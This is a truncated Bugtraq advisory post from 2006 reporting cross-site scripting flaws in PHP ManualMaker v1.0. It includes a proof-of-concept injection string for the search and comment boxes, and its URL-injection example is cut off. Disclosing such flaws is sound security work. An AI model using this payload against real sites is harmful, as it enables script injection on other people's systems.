Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
PHP ManualMaker v1.0 Jun 02 2006 03:07AM
luny youfucktard com
PHP ManualMaker v1.0

Homepage:

http://deltascripts.com/phpmanualmaker/

Effected files:

index.php

Search boxes

Comment boxes

XSS proof of concept:

Input in search or comment box:

">">">'><IMG SRC=javascript:alert('XSS')><""><'<"

XSS via URL injection of id:

http:/...

[ more ]  




 

Privacy Statement
Copyright 2009, SecurityFocus